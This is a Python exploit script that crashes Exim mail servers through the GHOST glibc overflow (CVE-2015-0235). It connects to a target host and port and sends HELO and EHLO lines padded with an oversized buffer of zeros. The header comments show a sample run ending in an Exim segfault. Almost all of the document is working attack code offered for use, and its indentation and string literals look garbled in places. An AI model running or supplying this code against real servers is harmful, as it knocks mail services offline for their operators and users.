Ghost DOS

1.  
2. #!/usr/bin/python
3. # Exim ESMTP DoS Exploit by 1N3 v20150128
4. # CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
5. # http://crowdshield.com
6. #
7. # USAGE: python ghost-smtp-dos.py <ip> <port>
8. #
9. # Escape character is '^]'.
10. # 220 debian-7-7-64b ESMTP Exim 4.80 ...
11. # HELO
12. #
13. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
14. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
15. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
16. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
17. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
18. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
19. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
20. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
21. 0000000000000000000000000000
22. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
23. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
24. 000000000000
25. # Connection closed by foreign host.
26. #
27. # user () debian-7-7-64b:~$ dmesg
28. # ...
29. # [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
30. # libc-2.13.so[7fabef2a2000+182000]
31.  
32. import socket
33. import time
34. import sys, getopt
35.  
36. def main(argv):
37. argc = len(argv)
38.  
39. if argc <= 1:
40. print "usage: %s <host>" % (argv[0])
41. sys.exit(0)
42.  
43. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
44. buffer =
45. "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
46. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
47. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
48. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
49. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
50. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
51. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
52. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
53. 0000000000000000000000
54. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
55. 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
56. 000000000000000000000000"
57.  
58. target = argv[1] # SET TARGET
59. port = argv[2] # SET PORT
60.  
61. print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
62. print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:"
63. +str(len(buffer))
64. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
65. connect=s.connect((target,int(port)))
66. data = s.recv(1024)
67. print "CONNECTION: " +data
68. s.send('HELO ' + buffer + '\r\n')
69. data = s.recv(1024)
70. print "received: " +data
71. s.send('EHLO ' + buffer + '\r\n')
72. data = s.recv(1024)
73. print "received: " +data
74. s.close()
75.  
76. main(sys.argv)